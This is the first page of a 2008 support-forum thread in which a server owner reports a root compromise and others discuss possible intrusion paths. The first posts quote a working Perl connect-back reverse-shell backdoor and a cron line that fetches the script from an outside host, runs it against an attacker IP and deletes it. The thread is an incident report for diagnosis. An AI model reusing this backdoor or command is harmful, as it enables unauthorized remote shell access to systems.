store | blogs | forums | twitter | facebook | wiki | mailing lists | downloads | support portal
Atomic Secure Linux
It is currently Thu Apr 24, 2014 1:48 am

» Feed - Atomicorp

All times are UTC - 5 hours [ DST ]




Post new topic Reply to topic  [ 32 posts ]  Go to page 1, 2, 3  Next
Author Message
 Post subject: Server hacked - unable to log case at Support panel [SOLVED]
Unread postPosted: Sat Oct 25, 2008 5:18 am 
Offline
Forum Regular
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
Hi,

My server has been hacked. Rootkit Hunter detects rootkits and it seems like they are using my server for sending spams. ASL hasnät prevented the attack and now I am in desperate need of help. But the support panel https://support.prometheus-group.com/ isn't working. I just gives an error message "There was an error processing your request. Please contact the webmaster. Redirected from: portal.php".

What should I do now? The wiki entry isnät very helpful. Just says look for suspicious files.. I could get everything back to the way it was before it got hacked, but they will probably use the same backdoor to hack it again.

The hacking launched a script with the following content:

Quote:
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";


Last edited by biggles on Sat Oct 25, 2008 8:18 am, edited 1 time in total.

Top
 Profile  
 
 Post subject:
Unread postPosted: Sat Oct 25, 2008 5:20 am 
Offline
Forum Regular
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
The script was run from cron:
(root) CMD (cd /tmp ; wget http://flaviu.conf-team.com/d.pl ; perl d.pl 88.191.98.145 23 ; rm -rf d.pl)


Top
 Profile  
 
 Post subject:
Unread postPosted: Sat Oct 25, 2008 9:55 am 
Offline
Forum Regular
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
They have installed something called verlihub. I read on the website that is is some kind of Direct Connect. Doesn't sound good....


Top
 Profile  
 
 Post subject:
Unread postPosted: Sat Oct 25, 2008 10:40 am 
Offline
Forum Regular
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
They had changed the login options for the user bin and permitted it to login.


Top
 Profile  
 
 Post subject:
Unread postPosted: Sat Oct 25, 2008 11:01 am 
Offline
Long Time Forum Regular
Long Time Forum Regular

Joined: Sat Aug 20, 2005 9:30 am
Posts: 2812
Location: The Netherlands
You need root access to change login options and it seems they also had root access to add that cron job. They must have exploited some vulnerability to get root access. What OS are you running? All updates applied? Were you running the ASL kernel?

Do you allow root SSH login using a password? Or they may have cracked your Plesk admin password and added the cron jon that way (if you haven't explicitly disabled being able to change root's crontab from Plesk).

_________________
Lemonbit Internet Dedicated Server Management


Top
 Profile  
 
 Post subject:
Unread postPosted: Sat Oct 25, 2008 11:08 am 
Offline
Forum Regular
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
Yeah, they probably gained root access. The server is RH EL4 running in a hosted VZ-container. So I am not able to run the ASL-kernel.

Everything is updated with yum and ASL.

Root login is not permitted. It is unlikely they have done the change through the Plesk-interface. The password is long and contains special characters.

It is the same thing that happened this summer that made me get ASL. Then I thought they got in by using a security hole in Joomla or ExponentCMS. Not and don't really now. My ASL subscription seems kinda wasted money...


Top
 Profile  
 
 Post subject:
Unread postPosted: Sat Oct 25, 2008 11:21 am 
Offline
Long Time Forum Regular
Long Time Forum Regular

Joined: Sat Aug 20, 2005 9:30 am
Posts: 2812
Location: The Netherlands
biggles wrote:
It is the same thing that happened this summer that made me get ASL. Then I thought they got in by using a security hole in Joomla or ExponentCMS.


Exploiting security holes in a CMS doesn't get you root access. Something more serious happened in this case.

_________________
Lemonbit Internet Dedicated Server Management


Top
 Profile  
 
 Post subject:
Unread postPosted: Sat Oct 25, 2008 11:30 am 
Offline
Forum Regular
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
OK. Good to hear that at least!

I have key-based SSH-login to the server and I cannot imagine how they could hack the Plesk password...


Top
 Profile  
 
 Post subject:
Unread postPosted: Sat Oct 25, 2008 1:20 pm 
Offline
Atomicorp Staff - Site Admin
Atomicorp Staff - Site Admin

Joined: Wed Dec 31, 1969 8:00 pm
Posts: 7780
Location: earth
They could have gotten in through another guest host, or by compromising the main server itself. Or even your desktop, best thing to do at this point would be to secure the /var/ossec/logs/ to another box for analysis.


Top
 Profile  
 
 Post subject:
Unread postPosted: Sat Oct 25, 2008 1:52 pm 
Offline
Forum Regular
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
Logs secured!


Top
 Profile  
 
 Post subject:
Unread postPosted: Sat Oct 25, 2008 4:18 pm 
Offline
Forum Regular
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
I am having a very good discussion with support now. The only problem is that my hosting company insists that this is a PHP backdoor that has been used and they are not willing to cooperate at all...


Top
 Profile  
 
 Post subject:
Unread postPosted: Mon Oct 27, 2008 5:54 pm 
Offline
Long Time Forum Regular
Long Time Forum Regular

Joined: Thu Dec 09, 2004 11:19 am
Posts: 2007
Please let us know the outcome. It isn't nice when this happens to anyone.

_________________
--------------------------------
<advert>
If you want to rent a UK-based VPS that comes with friendly advice and support from a fellow ART fan, please get in touch.
</advert>


Top
 Profile  
 
 Post subject:
Unread postPosted: Mon Oct 27, 2008 5:58 pm 
Offline
Forum Regular
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
Unfortunately there isn't any nice outcome. I still haven't the faintest idea why this happens and I don't have any idea how to stop it. They gained root access. Here it is suggested that it couldn't happen by just executing some php-scripts from a CMS and my hosting provider says it defiantly could happen with just a faulty script. I don't really know where to look...


Top
 Profile  
 
 Post subject:
Unread postPosted: Mon Oct 27, 2008 8:45 pm 
Offline
Long Time Forum Regular
Long Time Forum Regular

Joined: Sat Aug 20, 2005 9:30 am
Posts: 2812
Location: The Netherlands
biggles wrote:
They gained root access. Here it is suggested that it couldn't happen by just executing some php-scripts from a CMS and my hosting provider says it defiantly could happen with just a faulty script.


Your webserver and scripts don't run as root. An exploitable script can let an attacker run code, but it won't give him root access directly. To get to root, the attacker must have exploited something else to escalate privileges. Being able to run code in the first place helps of course, so a vulnerable script may have been the initial attack vector. I remember the vmsplice local root exploit from february this year, but if the server is running a up to date kernel (is it?), the attacker can't have used that one.

_________________
Lemonbit Internet Dedicated Server Management


Top
 Profile  
 
 Post subject:
Unread postPosted: Tue Oct 28, 2008 5:23 am 
Offline
Forum Regular
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
I really don't know. I am just renting a few servers based on RH EL4 with Plesk 8.3 which is running in Virtuozzo containers.


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 32 posts ]  Go to page 1, 2, 3  Next

» Feed - Atomicorp

All times are UTC - 5 hours [ DST ]


Who is online

Users browsing this forum: Bing [Bot] and 2 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group